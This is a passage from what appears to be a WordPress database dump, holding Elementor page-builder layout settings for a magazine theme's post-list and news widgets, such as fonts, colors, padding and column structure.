,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"s3s3gvd\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1108,409,'_elementor_version','0.4'),(1109,409,'_elementor_css','a:3:{s:4:\"time\";i:1508852751;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1111,410,'_elementor_edit_mode','builder'),(1112,410,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\"